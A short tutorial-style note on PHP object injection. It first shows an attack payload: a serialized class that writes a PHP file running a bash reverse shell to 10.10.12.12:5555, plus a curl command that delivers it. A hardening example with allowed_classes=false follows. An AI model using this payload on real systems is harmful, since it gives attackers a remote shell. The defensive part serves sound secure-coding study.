PHP deserialization
class Example2 {
    public $user_file = 'exploit.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.12.12/5555 0>&1\'"); ?>';
}
// Serialize the object and URL-encode the result for use in a query string
print urlencode(serialize(new Example2));
Running the above snippet in the interactive PHP shell (php -a) generates a URL-encoded payload that can be passed as a GET variable, e.g.:
curl -i http://my.rce.domain/vuln.php?args=O%3A14abovegeneratedVaRiAbLe
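How the receiving script can refuse a payload like this, shown as an added example that is not part of the original page. Example2Stub, parse_args_unsafe, parse_args_hardened and contains_object are hypothetical names, and the stub's destructor only counts its own calls in place of whatever magic method a real target class would run.

```php
<?php
// Added example. Example2Stub and the parse_args_* functions are hypothetical;
// the destructor only records that it ran, standing in for a risky magic method.
class Example2Stub {
    public $user_file = 'placeholder.txt';
    public $data = 'harmless';
    public static $fired = 0;
    public function __destruct() { self::$fired++; }
}

// Before: request data goes straight into unserialize(), so any loaded class
// named in the payload is instantiated and its magic methods run.
function parse_args_unsafe(string $raw) {
    return unserialize($raw);
}

// True if an object survives anywhere in the decoded value, nested arrays included.
function contains_object($value): bool {
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    return is_array($value) && in_array(true, array_map('contains_object', $value), true);
}

// After: allowed_classes => false (PHP 7.0+) turns every object into an inert
// __PHP_Incomplete_Class; the input is then rejected instead of being used.
function parse_args_hardened(string $raw) {
    $value = unserialize($raw, ['allowed_classes' => false]);
    if (contains_object($value)) {
        throw new UnexpectedValueException('serialized object rejected');
    }
    return $value;
}

// Constructed sample input: a serialized Example2Stub with harmless values.
$sample = 'O:12:"Example2Stub":2:{s:9:"user_file";s:15:"placeholder.txt";s:4:"data";s:8:"harmless";}';

$obj = parse_args_unsafe($sample);
unset($obj); // last reference dropped, destructor runs
echo 'unsafe path, destructor calls: ', Example2Stub::$fired, "\n";

Example2Stub::$fired = 0;
try {
    parse_args_hardened($sample);
} catch (UnexpectedValueException $e) {
    echo 'hardened path: ', $e->getMessage(), "\n";
}
echo 'hardened path, destructor calls: ', Example2Stub::$fired, "\n";
```

Where the parameter only needs to carry plain data, json_decode() avoids PHP's object-instantiation path altogether.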
More about PHP Object Injection, PHP Deserialization.